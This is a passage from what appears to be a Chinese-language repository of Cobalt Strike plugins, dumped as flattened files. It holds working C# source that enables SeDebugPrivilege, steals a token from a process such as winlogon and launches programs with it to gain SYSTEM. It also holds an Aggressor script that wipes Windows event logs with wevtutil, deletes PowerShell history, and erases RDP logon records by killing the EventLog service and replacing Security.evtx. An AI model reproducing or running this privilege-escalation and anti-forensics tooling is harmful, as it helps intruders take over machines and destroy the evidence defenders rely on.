0x00000020, 118 | WINSTA_EXITWINDOWS = 0x00000040, 119 | WINSTA_ENUMERATE = 0x00000100, 120 | WINSTA_READSCREEN = 0x00000200, 121 | 122 | WINSTA_ALL_ACCESS = 0x0000037F 123 | } 124 | 125 | 126 | public enum LogonFlags 127 | { 128 | WithProfile = 1, 129 | NetCredentialsOnly 130 | } 131 | 132 | public enum CreationFlags 133 | 134 | { 135 | 136 | DefaultErrorMode = 0x04000000, 137 | NewConsole = 0x00000010, 138 | NewProcessGroup = 0x00000200, 139 | SeparateWOWVDM = 0x00000800, 140 | Suspended = 0x00000004, 141 | UnicodeEnvironment = 0x00000400, 142 | ExtendedStartupInfoPresent = 0x00080000 143 | } 144 | 145 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 146 | internal struct STARTUPINFO 147 | { 148 | public Int32 cb; 149 | public string lpReserved; 150 | public string lpDesktop; 151 | public string lpTitle; 152 | public Int32 dwX; 153 | public Int32 dwY; 154 | public Int32 dwXSize; 155 | public Int32 dwYSize; 156 | public Int32 dwXCountChars; 157 | public Int32 dwYCountChars; 158 | public Int32 dwFillAttribute; 159 | public Int32 dwFlags; 160 | public Int16 wShowWindow; 161 | public Int16 cbReserved2; 162 | public IntPtr lpReserved2; 163 | public IntPtr hStdInput; 164 | public IntPtr hStdOutput; 165 | public IntPtr hStdError; 166 | } 167 | 168 | [StructLayout(LayoutKind.Sequential)] 169 | internal struct PROCESS_INFORMATION 170 | { 171 | public IntPtr hProcess; 172 | public IntPtr hThread; 173 | public int dwProcessId; 174 | public int dwThreadId; 175 | } 176 | 177 | [DllImport("advapi32.dll", SetLastError = true)] 178 | [return: MarshalAs(UnmanagedType.Bool)] 179 | static extern bool OpenProcessToken(IntPtr ProcessHandle, UInt32 DesiredAccess, out IntPtr TokenHandle); 180 | 181 | [DllImport("advapi32.dll")] 182 | static extern bool LookupPrivilegeValue(string lpSystemName, string lpName,ref LUID lpLuid); 183 | 184 | 185 | [DllImport("advapi32.dll", CharSet = CharSet.Unicode, SetLastError = true)] 186 | [return: MarshalAs(UnmanagedType.Bool)] 187 | internal static extern bool AdjustTokenPrivileges(IntPtr tokenhandle,[MarshalAs(UnmanagedType.Bool)] bool disableAllPrivileges,[MarshalAs(UnmanagedType.Struct)]ref TOKEN_PRIVILEGES newstate,uint bufferlength, IntPtr previousState, IntPtr returnlength); 188 | 189 | [DllImport("kernel32.dll", SetLastError = true)] 190 | public static extern IntPtr OpenProcess(uint processAccess,bool bInheritHandle,uint processId); 191 | 192 | [DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)] 193 | extern static bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess,IntPtr lpThreadAttributes,SECURITY_IMPERSONATION_LEVEL ImpersonationLevel, TOKEN_TYPE TokenType,out IntPtr phNewToken); 194 | 195 | [DllImport("advapi32", SetLastError = true, CharSet = CharSet.Unicode)] 196 | public static extern bool CreateProcessWithTokenW(IntPtr hToken, UInt32 dwLogonFlags, string lpApplicationName, string lpCommandLine, CreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); 197 | 198 | static bool EnablePrivilege() { 199 | IntPtr currenthandle = (IntPtr)Process.GetCurrentProcess().Handle; 200 | IntPtr hToken = IntPtr.Zero; 201 | LUID luidValue = new LUID(); 202 | TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES(); 203 | TOKEN_PRIVILEGES PreviousState = new TOKEN_PRIVILEGES(); 204 | UInt32 ReturnLengthInBytes = (UInt32)IntPtr.Zero; 205 | Console.WriteLine("[*] The Current Handle:"+ currenthandle); 206 | bool wdret = OpenProcessToken(currenthandle, TOKEN_ADJUST_PRIVILEGES, out hToken); 207 | if (wdret == false) { 208 | Console.WriteLine("[-] OpenProcessToken Failre,Error Code:" + Marshal.GetLastWin32Error()); 209 | return false; 210 | } 211 | Console.WriteLine("[*] The Token:" + hToken); 212 | bool privilege = LookupPrivilegeValue(null, "SeDebugPrivilege", ref luidValue); 213 | if (privilege == false) { 214 | Console.WriteLine("[-] LookupPrivilegeValue Failure,Error Code:" + Marshal.GetLastWin32Error()); 215 | return false; 216 | } 217 | Console.WriteLine("[*] LookupPrivilegeValue Sucess"); 218 | 219 | tp.PrivilegeCount = 1; 220 | tp.Luid = luidValue; 221 | tp.Attributes = SE_PRIVILEGE_ENABLED; 222 | bool bRet = AdjustTokenPrivileges(hToken, false, ref tp,(uint)IntPtr.Zero,IntPtr.Zero, IntPtr.Zero); 223 | if (bRet == false) { 224 | Console.WriteLine("[-] AdjustTokenPrivileges Failure,Error Code:" + Marshal.GetLastWin32Error()); 225 | return false; 226 | } 227 | Console.WriteLine("[*] AdjustTokenPrivileges Sucess"); 228 | return true; 229 | } 230 | 231 | static int FindPid(string processname) { 232 | Process[] process = Process.GetProcessesByName(processname); 233 | foreach (Process instace in process) { 234 | return instace.Id; 235 | } 236 | return 0; 237 | } 238 | 239 | static IntPtr GetAccessToken(int pid) { 240 | IntPtr currentProcess = IntPtr.Zero; 241 | IntPtr Asstoken = IntPtr.Zero; 242 | currentProcess = OpenProcess((uint)ProcessAccessTypes.PROCESS_QUERY_INFORMATION, true, (uint)pid); 243 | if (currentProcess==IntPtr.Zero) { 244 | Console.WriteLine("[-] OpenProcess winlogon Failure,Error Code:"+ Marshal.GetLastWin32Error()); 245 | return IntPtr.Zero; 246 | } 247 | Console.WriteLine("[*] OpenProcess winlogon Sucess,OpenProcess:"+ currentProcess); 248 | bool wdret = OpenProcessToken(currentProcess, TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY, out Asstoken); 249 | if (wdret == false) 250 | { 251 | Console.WriteLine("[-] OpenProcessToken Failre,Error Code:" + Marshal.GetLastWin32Error()); 252 | return IntPtr.Zero; 253 | } 254 | Console.WriteLine("[*] OpenProcessToken Sucess:"+ Asstoken); 255 | return Asstoken; 256 | } 257 | 258 | static bool Runprocess(IntPtr Token,string executepath) { 259 | bool dtx = DuplicateTokenEx(Token, (uint)ACCESS_MASK.MAXIMUM_ALLOWED, IntPtr.Zero, SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, TOKEN_TYPE.TokenPrimary, out Token); 260 | if (dtx == false) { 261 | Console.WriteLine("[-] DuplicateTokenEx Failure,Error Code:"+ Marshal.GetLastWin32Error()); 262 | return false; 263 | } 264 | Console.WriteLine("[*] DuplicateTokenEx Sucess,token:"+Token); 265 | STARTUPINFO si = new STARTUPINFO(); 266 | PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); 267 | bool ret = CreateProcessWithTokenW(Token, LOGON_NETCREDENTIALS_ONLY, executepath, null, CreationFlags.NewConsole, IntPtr.Zero, null, ref si, out pi); 268 | if (ret == false) { 269 | Console.WriteLine("[-] CreateProcessWithTokenW Failure,Error Code:"+ Marshal.GetLastWin32Error()); 270 | return false; 271 | } 272 | Console.WriteLine("[+] CreateProcessWithTokenW Sucess"); 273 | return true; 274 | 275 | } 276 | 277 | static int Main(string[] args) 278 | { 279 | string processname; 280 | string executepath; 281 | if (args.Length == 2) 282 | { 283 | processname = args[0]; 284 | if (processname.Contains(".exe")) { 285 | processname = processname.Substring(0,processname.IndexOf(".exe")); 286 | } 287 | executepath = args[1]; 288 | } 289 | else { 290 | Console.WriteLine("Example:systemcmd_cs.exe #Process为进程名,ExecutePath为你要运行的EXE路径"); 291 | return 1; 292 | } 293 | 294 | Console.WriteLine("[*] Find ProcessName:"+processname); 295 | bool enable = EnablePrivilege(); 296 | if (enable == false) 297 | { 298 | Console.WriteLine("[-] Enable Privilege:SeDebugPrivilege Failure"); 299 | } 300 | else { 301 | int winlogonpid = FindPid(processname); 302 | if (winlogonpid != 0) 303 | { 304 | Console.WriteLine("[*] The winlogon PID:" + winlogonpid); 305 | IntPtr atoken=GetAccessToken(winlogonpid); 306 | Runprocess(atoken, executepath); 307 | } 308 | } 309 | return 0; 310 | 311 | } 312 | } 313 | } 314 | -------------------------------------------------------------------------------- /权限维持/systemcmd_cs.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/权限维持/systemcmd_cs.exe -------------------------------------------------------------------------------- /痕迹清除/README.md: -------------------------------------------------------------------------------- 1 | ## 指定Evtx清除 ## 2 | ![](img/evtxclear.png) 3 | 4 | ## Powershell执行历史清除 ## 5 | ![](img/powershellclear.png) 6 | 7 | ## rdp登录日志清除 ## 8 | ![](img/rdpclear.png) -------------------------------------------------------------------------------- /痕迹清除/clear.cna: -------------------------------------------------------------------------------- 1 | sub rdpclear { 2 | foreach $bid ($1){ 3 | if (-isadmin $bid){ 4 | bshell($bid, "tasklist /svc | findstr \"eventlog\"") 5 | bpowerpick($bid, "wevtutil epl Security C:\\Windows\\System32\\winevt\\Logs\\Security_new.evtx /q:\"*[EventData[(Data[@Name='IpAddress']='192.168.93.140')]]\" /ow:true;write-host \"[*] Dump IPAddress:127.0.0.1 New evtx\";\$envetlogpid=Get-WmiObject -Class win32_service -Filter \"name = 'eventlog'\" | select -exp ProcessId;write-host \"[*] Kill EventLog Process\";taskkill /F /PID \$envetlogpid;write-host \"[*] Move New Security Evtx ->\";Move-Item C:\\Windows\\System32\\winevt\\Logs\\Security_new.evtx C:\\Windows\\System32\\winevt\\Logs\\Security.evtx -force;write-host \"[*] Run Eventlog Service\";net start eventlog"); 6 | 7 | }else{ 8 | berror($bid, "非管理员权限") 9 | } 10 | } 11 | } 12 | 13 | sub powershellhistory{ 14 | $files = "C:\\Users\\$3['username']\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt"; 15 | brm($3["bid"], $files); 16 | } 17 | 18 | sub eventlogclear{ 19 | if($3["Security"] eq 'true'){ 20 | btask($3['bid'], "Clear EventLog Security"); 21 | bshell($3['bid'], "wevtutil cl Security"); 22 | } 23 | 24 | if($3["System"] eq 'true'){ 25 | btask($3['bid'], "Clear EventLog System"); 26 | bshell($3['bid'], "wevtutil cl System"); 27 | } 28 | 29 | if($3["Application"] eq 'true'){ 30 | btask($3['bid'], "Clear EventLog Application"); 31 | bshell($3['bid'], "wevtutil cl Application"); 32 | } 33 | 34 | if($3["Setup"] eq 'true'){ 35 | btask($3['bid'], "Clear EventLog Setup"); 36 | bshell($3['bid'], "wevtutil cl Setup"); 37 | } 38 | 39 | } 40 | 41 | popup beacon_bottom{ 42 | $bid = $1; 43 | menu "&痕迹清除"{ 44 | item "&RDP登录日志清除" { 45 | rdpclear($bid); 46 | } 47 | 48 | item "&powershell执行命令历史清除"{ 49 | foreach $id ($bid){ 50 | $dialog = dialog("PowerShell History Clear", %(username => "Administrator", bid => $id), &powershellhistory); 51 | dialog_description($dialog, "用于清除非windows powershell执行命令记录(Windows Server 2016以下执行的powershell命令不会存储)"); 52 | drow_text($dialog, "username", "username:"); 53 | dbutton_action($dialog, "run"); 54 | dialog_show($dialog); 55 | } 56 | } 57 | 58 | item "&清除指定日志"{ 59 | foreach $id ($bid){ 60 | $dialog = dialog("Eventlog Clear", %(bid => $id), &eventlogclear); 61 | dialog_description($dialog, "清除指定windows日志"); 62 | drow_checkbox($dialog, "Security", "Security Evtx", "Security"); 63 | drow_checkbox($dialog, "System", "System Evtx", "System"); 64 | drow_checkbox($dialog, "Application", "Application Evtx", "Application"); 65 | drow_checkbox($dialog, "Setup", "Setup Evtx", "Setup"); 66 | dbutton_action($dialog, "run"); 67 | dialog_show($dialog); 68 | } 69 | } 70 | } 71 | 72 | } -------------------------------------------------------------------------------- /痕迹清除/img/evtxclear.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/痕迹清除/img/evtxclear.png -------------------------------------------------------------------------------- /痕迹清除/img/powershellclear.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/痕迹清除/img/powershellclear.png -------------------------------------------------------------------------------- /痕迹清除/img/rdpclear.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jiushill/csplugin/59f4484bc3f0867cf3f73da683e384b417115f0d/痕迹清除/img/rdpclear.png --------------------------------------------------------------------------------